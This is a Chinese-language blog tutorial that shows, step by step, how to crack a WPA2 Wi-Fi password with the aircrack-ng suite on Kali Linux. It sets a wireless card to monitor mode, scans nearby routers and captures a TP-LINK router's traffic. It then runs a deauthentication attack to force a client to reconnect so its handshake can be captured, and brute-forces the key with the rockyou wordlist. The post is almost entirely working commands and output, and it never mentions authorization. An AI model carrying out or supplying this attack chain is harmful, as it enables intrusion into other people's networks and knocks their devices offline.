kill linux

# 查看得到網卡名爲wlan0:
iwconfig
# 內容如下:
eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  ...

# 找到Wi-Fi代號爲wlan0,接着啓動monitor模式:
airmon-ng start wlan0

# 查看附近的無線網絡
airodump-ng wlan0mon
# 內容如下:
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                             

 F2:B4:29:E5:1C:74   -1        0       20    0   6  -1   OPN              <length:  0>                                      
 94:77:2B:47:92:1C  -74      119     1842   49   7  54e  WPA2 CCMP   PSK  HUAWEI-RF4BXM                                  
 14:75:90:DB:90:91  -81       53        0    0  11  54e. WPA2 CCMP   PSK  TP-LINK_DB9091    

# 選擇一個Wi-Fi,複製BSSID,記下CH信道,組合如下命令開始攻擊抓包
# [演示選擇TP-Link:airodump-ng wlan0mon --bssid 複製的BSSID -c CH信道 -w 保存名]
airodump-ng wlan0mon --bssid 14:75:90:DB:90:91 -c 11 -w wificrack

# 可以看到,有一臺設備連接到該路由WiFi,但此時沒有設備連入,故抓不到完整4步握手包。
# 若抓不到4步握手,則通過以下命令斷開設備與WiFi的連接,使其重新建立連接從而可以抓取四步握手信息:
# 新開一個Terminal窗口:[參數:攻擊2次,路由ssid和設備Mac地址]
aireplay-ng -0 2 -a 14:75:90:DB:90:91 -c 54:DC:1D:27:0D:50 wlan0mon

# 原窗口得到握手包:內容如下:
 CH 11 ][ Elapsed: 5 mins ][ 2018-01-29 05:52 ][ WPA handshake: 14:75:90:DB:90:91                                           

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                         

 14:75:90:DB:90:91  -71  93     3136       43    0  11  54e. WPA2 CCMP   PSK  TP-LINK_DB9091                                

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                  

 14:75:90:DB:90:91  54:DC:1D:27:0D:50  -39    0e- 0e     0       44  TP-LINK_DB9091 

通過ls wificrack*命令查看抓到的信息保存的文件(多的wpa包是之前做測試保存下來的):

這裏看最新的那個即wifi-04即可,可以看到總共有4個。

# 後面使用Kali Linux中默認存在的字典,目錄[需要使用命令來解壓]
/usr/share/wordlists/rockyou.txt.zip
# 這裏順便記錄一下Kali中幾個常用的字典文件的位置:
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists

# 如果沒有該文件,就需要下載:
wget http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt

# 破解:[rockyou.txt是字典、wifi-01.cap是抓包]
aircrack-ng -w rockyou.txt wificrack-01.cap
# 結果如下:[密碼爲:12345678]
                                 Aircrack-ng 1.2 rc4                                                                        

      [00:00:00] 4/4 keys tested (31.56 k/s)                                                                                

      Time left: 0 seconds                                     100.00%                                                      

                           KEY FOUND! [ 12345678 ]                                                                          
# 關閉wlan0無線網卡monitor mode
airmon-ng stop wlan0mon

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章